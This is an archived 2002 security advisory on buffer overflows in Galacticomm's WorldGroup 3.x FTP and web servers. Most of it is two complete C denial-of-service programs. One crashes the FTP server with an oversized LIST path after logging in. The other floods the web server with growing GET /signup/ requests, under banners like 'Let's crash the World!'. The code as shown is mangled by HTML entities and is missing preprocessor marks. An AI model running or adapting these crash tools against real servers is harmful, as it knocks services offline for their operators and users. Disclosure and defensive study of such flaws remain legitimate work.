SECURITY.NNOV: Buffer overflows in Worldgroup

2002-02-27T00:00:00
ID SECURITYVULNS:DOC:2553
Type securityvulns
Reporter Securityvulns
Modified 2002-02-27T00:00:00

Description

Dear bugtraq,

Topic: buffer overflows in WorldGroup 3.0 ftp and web servers
Authors: Limpid Byte team (http://lbyte.void.ru, lbyte@host.sk)
Date: February 25, 2002
Software: WorldGroup 3.x
Vendor: Galacticomm (http://www.gcomm.com/)
Risk: High
Remote: Yes
Exploitable: Yes
Vendor Status: Not contacted, not confirmed

Details:

Limpid Byte team (http://lbyte.void.ru, lbyte@host.sk) reports buffer overflows in WorldGroup 3.x ftp and web servers by Galacticomm (http://www.gcomm.com/).

The FTP server overflows on a long LIST command. The HTTP server overflows on a long request of the form GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0

Vendor:

Vendor was not contacted because contact information is not available on the Web site (support only available for registered users).

Exploit:

DoS exploits by Limpid Byte team (also available from http://www.security.nnov.ru/files/worldgroupdos.zip)

----------------- BEGIN FTP_DOS.C ---------------------
/* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk

[Worldgroup FTP Server Denial of Service] More than 105 "/" in LIST command.

*/

include <stdio.h>

include <stdlib.h>

include <string.h>

include <winsock.h>

define FOUND "220"

/*
 * Advisory proof-of-concept (FTP_DOS.C). Connects to the target's FTP port,
 * logs in with the supplied login and password, sends PASV and then a single
 * LIST whose argument is a long "/..//" path - the request shape the advisory
 * identifies as the trigger. The program only prints the conversation and
 * returns 0. Windows-only (WinSock 1.1).
 *
 * Arguments: argv[1] host, argv[2] login, argv[3] password.
 */
int main(int argc, char argv[]) { int sock; struct sockaddr_in blah; struct hostent he; char cgiBuff[1024]; char *cgiPage[6]; WSADATA wsaData; char cr[] = "\n";

    /* Usage banner; exits unless host, login and password were all given. */
    if &#40;argc &lt; 3&#41;
    {

/* The line below holds the usage text and, after the closing brace, the
   command table. cgiPage[0..4] form the ordinary USER/PASS/PASV exchange;
   cgiPage[5] is the oversized LIST path the advisory describes (more than
   105 "/") and is the only abnormal request in the session. */
printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K."); printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r USAGE:\n\r"); printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] "); printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n"); exit(1); } cgiPage[0] = "USER "; cgiPage[1] = (argv[2]); cgiPage[2] = "PASS "; cgiPage[3] = (argv[3]); cgiPage[4] = "PASV"; cgiPage[5] = "LIST /..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../\n";

    /* WinSock 1.1 initialisation; failure is fatal. */
    if&#40;WSAStartup&#40;0x101,&amp;wsaData&#41;&#41;
    {
            printf&#40;&quot;Unable to initialize WinSock lib.&#92;n&quot;&#41;;
            exit&#40;1&#41;;
    }

/* Operator-facing banner only. */
printf("Let's crash the World!\n\r"); printf("Coded by the [eaSt]:\n\r"); printf("\nConnecting %s on port 21...\n\n", argv[1]);

    /* Address setup: sin_addr is first filled from inet_addr(); if
       gethostbyname() resolves argv[1] that result overwrites it, otherwise
       inet_addr() is repeated only to detect INADDR_NONE and bail out. */
    sock = socket&#40;AF_INET,SOCK_STREAM,0&#41;;
    blah.sin_family=AF_INET;
    blah.sin_addr.s_addr=inet_addr&#40;argv[1]&#41;;
    blah.sin_port=htons&#40;21&#41;;
    if &#40;&#40;he = gethostbyname&#40;argv[1]&#41;&#41; != NULL&#41;
    {
            memcpy&#40;&#40;char *&#41;&amp;blah.sin_addr, he-&gt;h_addr, he-&gt;h_length&#41;;
    }
    else
    {
            if &#40;&#40;blah.sin_addr.s_addr = inet_addr&#40;argv[1]&#41;&#41;==INADDR_NONE&#41;
            {
            WSACleanup&#40;&#41;;
            exit&#40;1&#41;;
            }
    }

    /* Connection failure exits without closing the socket. */
    if &#40;connect&#40;sock,&#40;struct sockaddr*&#41;&amp;blah,sizeof&#40;blah&#41;&#41;!=0&#41;
    {
            WSACleanup&#40;&#41;;
            exit&#40;1&#41;;
    }
    /* Read the server greeting. NOTE(review): recv()'s return value is used
       directly as an index, so a SOCKET_ERROR (-1) result would write to
       cgiBuff[-1]; the same pattern repeats for every reply below. */
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&lt;&lt; &#37;s&quot;, cgiBuff&#41;;
    /* USER <login>; cr is a single LF, not the CRLF the protocol normally uses. */
    send&#40;sock,cgiPage[0],strlen&#40;cgiPage[0]&#41;,0&#41;;
    send&#40;sock,cgiPage[1],strlen&#40;cgiPage[1]&#41;,0&#41;;
    send&#40;sock,cr,1,0&#41;;
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&gt;&gt; &#37;s &#37;s&#92;n&lt;&lt; &#37;s&quot;, cgiPage[0], cgiPage[1], cgiBuff&#41;;
    /* PASS <password>. */
    send&#40;sock,cgiPage[2],strlen&#40;cgiPage[2]&#41;,0&#41;;
    send&#40;sock,cgiPage[3],strlen&#40;cgiPage[3]&#41;,0&#41;;
    send&#40;sock,cr,1,0&#41;;
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&gt;&gt; &#37;s &#37;s&#92;n&lt;&lt; &#37;s&quot;, cgiPage[2], cgiPage[3], cgiBuff&#41;;
    /* PASV; the reply is printed but the data port it announces is never used. */
    send&#40;sock,cgiPage[4],strlen&#40;cgiPage[4]&#41;,0&#41;;
    send&#40;sock,cr,1,0&#41;;
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&gt;&gt; &#37;s&#92;n&lt;&lt; &#37;s&quot;, cgiPage[4], cgiBuff&#41;;
    /* The trigger request. cgiPage[5] already ends in "\n" and a second LF
       follows; whatever (if anything) the server answers is printed. */
    send&#40;sock,cgiPage[5],strlen&#40;cgiPage[5]&#41;,0&#41;;
    send&#40;sock,cr,1,0&#41;;
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&gt;&gt; &#37;s&#92;n&lt;&lt; &#37;s&quot;, cgiPage[5], cgiBuff&#41;;

    /* Hint to the operator only. The socket is never passed to closesocket();
       only WSACleanup() runs before returning. */
    printf&#40;&quot;Try reconnect to &#37;s&#92;n&quot;, argv[1]&#41;;
    WSACleanup&#40;&#41;;
    return 0;

} ----------------- END FTP_DOS.C ---------------------

----------------- BEGIN WWW_DOS.C ---------------------
/* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk

Worldgroup Server Denial of Service for Windows 9x/ME only. Fault in the interaction between a Windows system function and Worldgroup, reached through the web interface. REQUEST: GET /signup/a.[aaaaaaaa....aaaa]

*/

include <stdio.h>

include <stdlib.h>

include <string.h>

include <winsock.h>

define FOUND "200"

/*
 * Advisory proof-of-concept (WWW_DOS.C). Opens 94 successive connections to
 * the target's port 80; on each it sends one GET /signup/a...a.txt?=../test.txt
 * request whose run of 'a' grows from 219 to 312 bytes, and reports whether a
 * reply came back. The program only prints and returns 0. Windows-only
 * (WinSock 1.1).
 *
 * Argument: argv[1] host.
 */
int main(int argc, char argv[]) { int sock, count; struct sockaddr_in blah; struct hostent he; char cgiBuff[1024]; WSADATA wsaData;

    /* Usage banner; exits unless a host was given. */
    if &#40;argc &lt; 2&#41;
    {
            printf&#40;&quot;&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.&#92;n&quot;&#41;;
            printf&#40;&quot;Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!&#92;n&#92;n&quot;&#41;;
            printf&#40;&quot; USAGE   : www_dos.exe [HOST] &#92;n&quot;&#41;;
            printf&#40;&quot; example : www_dos.exe 127.0.0.1 &#92;n&quot;&#41;;
            exit&#40;1&#41;;
    }

    /* WinSock 1.1 initialisation; failure is fatal. */
    if&#40;WSAStartup&#40;0x101,&amp;wsaData&#41;&#41;  
    {
            printf&#40;&quot;Unable to initialize WinSock lib.&#92;n&quot;&#41;; 
            exit&#40;1&#41;;   
    }
    /* Operator-facing banner only. */
    printf&#40;&quot;Let&#39;s crash the World!&#92;n&quot;&#41;;
    printf&#40;&quot;Coded by the [eaSt]:&#92;n&quot;&#41;;
    printf&#40;&quot;&#92;nScanning &#37;s on port 80...&#92;n&#92;n&quot;, argv[1]&#41;;

    /* One fresh connection per iteration; count only widens the padding. */
    for &#40;count = 0; count &lt; 94; count++&#41;
    {
            /* Address setup, repeated every iteration: sin_addr is filled
               from inet_addr(), overwritten by gethostbyname() when the name
               resolves, otherwise inet_addr() is repeated to detect INADDR_NONE. */
            sock = socket&#40;AF_INET,SOCK_STREAM,0&#41;;
            blah.sin_family=AF_INET;
            blah.sin_addr.s_addr=inet_addr&#40;argv[1]&#41;;
            blah.sin_port=htons&#40;80&#41;;
            if &#40;&#40;he = gethostbyname&#40;argv[1]&#41;&#41; != NULL&#41;
            {
                    memcpy&#40;&#40;char *&#41;&amp;blah.sin_addr, he-&gt;h_addr, he-&gt;h_length&#41;;
            }
            else
            {
                    if &#40;&#40;blah.sin_addr.s_addr = inet_addr&#40;argv[1]&#41;&#41;==INADDR_NONE&#41;
                {
                            WSACleanup&#40;&#41;;
                            exit&#40;1&#41;;
                    }
            }

            /* A refused connection ends the whole run (no closesocket()). */
            if &#40;connect&#40;sock,&#40;struct sockaddr*&#41;&amp;blah,sizeof&#40;blah&#41;&#41;!=0&#41;
            {
                    WSACleanup&#40;&#41;;
                    exit&#40;1&#41;;
            }

            /* Build the request in place: the 12-byte prefix "GET /signup/",
               then 219+count bytes of 'a', then the fixed suffix. At the
               largest count that is 12 + 312 + 28 bytes plus the terminator,
               well inside cgiBuff[1024]. NOTE(review): strlen() returns
               size_t but is printed with %d. */
            memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
            sprintf&#40;cgiBuff, &quot;GET /signup/&quot;&#41;;
            memset&#40;cgiBuff + 12, &#39;a&#39;, 219 + count&#41;;
            sprintf&#40;cgiBuff + 12 + 219 + count, &quot;.txt?=../test.txt HTTP/1.0&#92;n&#92;n&quot;&#41;;
            printf&#40;&quot;Sending: &#37;d symbols request&#92;n&quot;, strlen&#40;cgiBuff&#41;&#41;;

            /* A zero-length recv() (peer closed without answering) is reported
               as "Crashed". A negative SOCKET_ERROR return does not satisfy
               !recv() and so falls into the else branch, where the (empty)
               buffer is printed as if it were a reply. The reply is cut at
               32 bytes, which also guarantees a terminator even though recv()
               was given the full buffer size. FOUND is the status string
               defined above the function ("200"). */
            send&#40;sock,cgiBuff,strlen&#40;cgiBuff&#41;,0&#41;;
            memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
            if&#40;!recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41;,0&#41;&#41; {
                    printf&#40;&quot;Crashed&#92;n&quot;&#41;;
            }
            else {
                    cgiBuff[32] = 0;
                    if &#40;strstr&#40;cgiBuff,FOUND&#41;&#41;
                    {
                            printf&#40;&quot;Send &#40;&#37;s&#41;&#92;n&quot;, cgiBuff&#41;;
                    }
                    else
                    {
                            printf&#40;&quot;Not Found &#40;&#37;s&#41;&#92;n&quot;, cgiBuff&#41;;
                    }
            }

            /* Unlike the FTP listing, each connection is closed before the next. */
            closesocket&#40;sock&#41;;
    }

    /* Hint to the operator only. */
    printf&#40;&quot;Try reconnect to &#37;s&#92;n&quot;, argv[1]&#41;;
    WSACleanup&#40;&#41;;
    return 0;

} ----------------- END WWW_DOS.C ---------------------

-- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)